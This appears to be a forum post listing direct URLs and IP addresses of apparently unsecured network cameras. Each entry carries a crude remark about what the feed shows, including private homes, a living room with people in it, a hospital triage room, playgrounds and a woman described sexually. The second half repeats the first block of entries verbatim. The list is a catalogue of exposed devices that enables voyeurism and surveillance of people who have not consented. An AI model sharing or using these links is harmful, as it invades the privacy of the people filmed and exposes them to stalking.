    http://sundern-heute.dnsalias.net/control/userimage.html

    It’s a peaceful little corner in some sleepy hamlet. I think. Hell, could be a shit hole for all I know.

    http://www.7-milemarina.com/home/homeJ.html

    http://camelive.info/camera/sundern-heute.dnsalias.net/

    http://81.113.134.90:8080/control/userimage.html

    A peaceful, out in the middle of fucking nowhere front lawn. Or a back lawn. I can’t say for sure.

    http://95.45.245.105:89/control/userimage.html

    Dromad-Hire : the right tool for YOUR job :)

    I think it’s a whore house…

    http://217.91.47.250/control/userimage.html

    I think this is from denmark. And I know those are wind-powered generators. And it’s a stormin’.


    http://216.199.194.134:82/control/userimage.html

    A nice pool. Maybe when day breaks, people will start swimming in it. Or dogs. Never know.

    http://comfcamp.dyndns.org/control/userimage.html

    A RV park. Not creepy in itself, but I can see people moving now and then. Trailer-park people are scary as fuck.

    http://fer.kgbinternet.com/webcams/offset.jsp?url=87.28.180.181/control/userimage.html&linkpagin
    a=&offsetvertic=45&offsetorizz=110&altezza=512&larghezza=645&nomecam=IBARCI&
    citta=Barcis&titolo1=&titolo2=

    Ah, italy. It really is a beautiful place.

    http://cam118317.miemasu.net/ViewerFrame?Mode=Motion&Language=1

    It’s a harbor of some sort. I think it’s japanese, but I can only guess.

    http://oharano.miemasu.net:60011/CgiStart?page=Single&Mode=Motion

    A playground. That slide, man…

    http://cam57365.miemasu.net/ViewerFrame?Mode=Motion&Language=1

    This looks like some dude’s back door. Or the door to his garage.

    http://kinomi.miemasu.net/ViewerFrame?Mode=Motion&Language=4

    I think I found an inside playground. It’s sunday, so nothing going on, though.

    http://sisou.miemasu.net/ViewerFrame?Mode=Motion&Language=5

    http://137.229.91.245/view/index.shtml

    A skyview, I think. Might be worth watching in case a ufo or something flies by.

    http://80.26.69.138:8080/

    Eerie lighting, and I keep seeing something moving behind the pole. Probably a flag or something, but who knows?

    http://85.119.14.194/view/index.shtml

    An old church on a hill. Looks straight out of a movie.

    http://195.73.15.148:82/view/index.shtml

    The wind on this cam is crazy. Makes the lights look cool.

    http://66.35.137.235/

    A printing press warehouse. Not going right now, so I have no idea what they print.

    http://home.hepner.net:1955/CgiStart?page=Single&Mode=Motion&Language=0

    Here’s some living room with people playing something in it. No clue what, though.

    http://128.104.138.26/axis-cgi/mjpg/video.cgi

    An ant farm. Could be from a zoo, but I don’t care to dig into the cams right now.

    http://173.165.159.41:8086/cgi-bin/guestimage.html

    A triage room for some hospital. There are people wondering around, but no patients right now. Must be boring.

    http://158.39.49.111/view/view.shtml

    Another sky view. I like raiding my old threads for links to post. It’s one hell of a lot easier than searching google for new ones.

    big boobed gal and her dog:

    http://99.109.136.202/anony/mjpg.cgi

    http://128.196.12.223/home/homeJ.html

    http://62.44.223.185/sample/LvAppl/lvappl.htm

   A little bit creepy. Only a little.

    http://134.29.208.43/axis-cgi/mjpg/video.swf

  aircraft hangar

    http://209.113.157.25/indexFrame.html

    http://128.171.116.64/view/view.shtml

    Cams watching cams watching cams…

    http://cafe-cam.wulib.wustl.edu/view/view.shtml

    A few people studying, I think.

    http://213.211.42.237/axis-cgi/mjpg/video.swf?resolution=640x480&camera=1

    http://allen-construction-webcam.uoregon.edu/view/index.shtml

    A building being built. Well, if it was daytime maybe.

    http://lioncam.una.edu/view/view.shtml

    Here’s a lion cage. Of course, you can’t see the damn things, but the scene is creepy.

    http://kamera-zamek.jhcomp.cz/axis-cgi/mjpg/video.swf?resolution=320x240

    http://axis-784fce.axiscam.net/axis-cgi/mjpg/video.swf

    http://camera.buffalotrace.com/view/view.shtml?imagePath=/mjpg/video.mjpg&size=1

    http://81.8.158.58/view/view.shtml

    A statue or something. The snow is a nice touch.

    http://www.oldetownepetresort.com/cam/suite213.htm

    D’AAWW. It’s a puppy!

    http://www.sverigeinfo.eu/webcams/vindeln_svartberget_2.htm

    A house in the snow. I keep waiting for something to walk by.
    Also, death by chocolate ice cream is bomb, but damn is it sugary.

    http://128.171.104.32/view/view.shtml

    Here’s an odd one with a door. I don’t know what.

    http://66.14.118.60/view/view.shtml

    IT’S JEEBUS! Still, I wonder what the cam is for? Maybe to watch and see if he moves?

    http://lv.raad.tartu.ee:10001/view/index.shtml

    Another statue cam. Fun times out in the snow.

    http://151.97.160.7/view/view.shtml

    ANOTHER strange statue thing. For some reason, I’m just finding these damn things all over.

    http://www.mesto-most.cz/vismo/dokumenty2.asp?id_org=9959&id=4206&p1=1161

    I like the second camera here. It looks like a flowing river. Very peaceful.

    http://89.162.72.203/axis-cgi/mjpg/video.cgi?resolution=CIF&dummy=1306400814056

    This cam shoots all over the place. I caught a car driving by, but that was a few minutes ago, and I haven’t seen one since.

    http://195.200.199.8/axis-cgi/mjpg/video.cgi?resolution=CIF&dummy=1294740006648

    A very smooth camera. Again, it moves around, but the area it covers looks like a foot-path along a river.

    http://www.immobilierenfrance.fr/view/ptzFrame.shtml

    I’m not sure what this is actually. It’s some kind of console, but the only thing that rings a bell to me is a car radio. And it’s not a car radio.

    http://www.nagyegedi-villa.hu/view/bigView.shtml

    Now this is a good one. It appears to be several security cams set up inside and ouside a house. Of course, it looks a little dead right now. It might be vacant, I don’t know.

    http://142.166.240.118/control/userimage.html

    A crane. Above a work place.

    http://cam266949.miemasu.net/ViewerFrame?Mode=Motion&Resolution=320x240&Quality=Motion&I
    nterval=30&Size=STD&PresetOperation=Move&Language=0

    http://sundern-heute.dnsalias.net/control/userimage.html

    It’s a peaceful little corner in some sleepy hamlet. I think. Hell, could be a shit hole for all I know.

    http://www.7-milemarina.com/home/homeJ.html

    http://camelive.info/camera/sundern-heute.dnsalias.net/

    http://81.113.134.90:8080/control/userimage.html

    A peaceful, out in the middle of fucking nowhere front lawn. Or a back lawn. I can’t say for sure.

    http://95.45.245.105:89/control/userimage.html

    Dromad-Hire : the right tool for YOUR job :)

    I think it’s a whore house…

    http://217.91.47.250/control/userimage.html

    I think this is from denmark. And I know those are wind-powered generators. And it’s a stormin’.


    http://216.199.194.134:82/control/userimage.html

    A nice pool. Maybe when day breaks, people will start swimming in it. Or dogs. Never know.

    http://comfcamp.dyndns.org/control/userimage.html

    A RV park. Not creepy in itself, but I can see people moving now and then. Trailer-park people are scary as fuck.

    http://fer.kgbinternet.com/webcams/offset.jsp?url=87.28.180.181/control/userimage.html&linkpagin
    a=&offsetvertic=45&offsetorizz=110&altezza=512&larghezza=645&nomecam=IBARCI&
    citta=Barcis&titolo1=&titolo2=

    Ah, italy. It really is a beautiful place.

    http://cam118317.miemasu.net/ViewerFrame?Mode=Motion&Language=1

    It’s a harbor of some sort. I think it’s japanese, but I can only guess.

    http://oharano.miemasu.net:60011/CgiStart?page=Single&Mode=Motion

    A playground. That slide, man…

    http://cam57365.miemasu.net/ViewerFrame?Mode=Motion&Language=1

    This looks like some dude’s back door. Or the door to his garage.

    http://kinomi.miemasu.net/ViewerFrame?Mode=Motion&Language=4

    I think I found an inside playground. It’s sunday, so nothing going on, though.

    http://sisou.miemasu.net/ViewerFrame?Mode=Motion&Language=5